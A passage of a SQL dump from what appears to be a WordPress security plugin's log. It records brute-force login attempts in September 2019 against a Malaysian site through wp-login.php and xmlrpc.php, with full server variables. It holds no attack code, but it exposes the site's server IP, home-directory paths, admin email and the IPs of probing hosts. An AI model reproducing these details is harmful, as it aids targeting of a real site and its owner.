Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"216.57.226.2\";s:11:\"REMOTE_PORT\";s:5:\"46974\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEv3cvSqvOOv2GhWJhVmQAAANA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568747485.2688\";s:12:\"REQUEST_TIME\";s:10:\"1568747485\";}}','notice','2019-09-17 19:11:26','2019-09-17 19:11:25',18258936,19556464,'https://bintara.com.my/xmlrpc.php',1,0,'216.57.226.2'),(24701,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"80.82.122.216\";s:11:\"REMOTE_PORT\";s:5:\"32834\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEwMI75s89pqgR69SLIYAAAAYk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568747568.1158\";s:12:\"REQUEST_TIME\";s:10:\"1568747568\";}}','notice','2019-09-17 19:12:51','2019-09-17 19:12:48',17740088,19230904,'https://bintara.com.my/wp-login.php',1,0,'80.82.122.216'),(24702,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"80.82.122.216\";s:11:\"REMOTE_PORT\";s:5:\"35078\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEwOW4SfF9g@8lNlxwe@gAAAFU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568747579.0545\";s:12:\"REQUEST_TIME\";s:10:\"1568747579\";}}','notice','2019-09-17 19:13:08','2019-09-17 19:12:59',18256992,19555784,'https://bintara.com.my/xmlrpc.php',1,0,'80.82.122.216'),(24703,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"178.128.178.187\";s:11:\"REMOTE_PORT\";s:5:\"34252\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEzASqbKGlf1IVly7N0PAAAAUI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568748289.9986\";s:12:\"REQUEST_TIME\";s:10:\"1568748289\";}}','notice','2019-09-17 19:24:51','2019-09-17 19:24:50',17739800,19231032,'https://bintara.com.my/wp-login.php',1,0,'178.128.178.187'),(24704,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"178.128.178.187\";s:11:\"REMOTE_PORT\";s:5:\"34966\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEzBSR0vdvYEIduPCLMSAAAARc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568748293.6549\";s:12:\"REQUEST_TIME\";s:10:\"1568748293\";}}','notice','2019-09-17 19:24:54','2019-09-17 19:24:54',18257216,19556208,'https://bintara.com.my/xmlrpc.php',1,0,'178.128.178.187'),(24705,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"128.199.133.250\";s:11:\"REMOTE_PORT\";s:5:\"39928\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEzaiqbKGlf1IVly7N0VwAAAU8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568748394.6012\";s:12:\"REQUEST_TIME\";s:10:\"1568748394\";}}','notice','2019-09-17 19:26:35','2019-09-17 19:26:34',17740592,19232720,'https://bintara.com.my/wp-login.php',1,0,'128.199.133.250'),(24706,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"128.199.133.250\";s:11:\"REMOTE_PORT\";s:5:\"40242\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEzbCR0vdvYEIduPCLMUAAAAQ0\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568748396.699\";s:12:\"REQUEST_TIME\";s:10:\"1568748396\";}}','notice','2019-09-17 19:26:38','2019-09-17 19:26:37',18258552,19558160,'https://bintara.com.my/xmlrpc.php',1,0,'128.199.133.250'),(24707,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"89.152.241.114\";s:11:\"REMOTE_PORT\";s:5:\"33212\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYE2ICqbKGlf1IVly7N1BAAAAVI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568749088.6362\";s:12:\"REQUEST_TIME\";s:10:\"1568749088\";}}','notice','2019-09-17 19:38:09','2019-09-17 19:38:09',17738688,19230656,'https://bintara.com.my/wp-login.php',1,0,'89.152.241.114'),(24708,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"89.152.241.114\";s:11:\"REMOTE_PORT\";s:5:\"33796\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYE2JEQGijxhVPhG1M37TwAAAAo\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568749092.5675\";s:12:\"REQUEST_TIME\";s:10:\"1568749092\";}}','notice','2019-09-17 19:38:14','2019-09-17 19:38:12',18257600,19556776,'https://bintara.com.my/xmlrpc.php',1,0,'89.152.241.114'),(24709,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 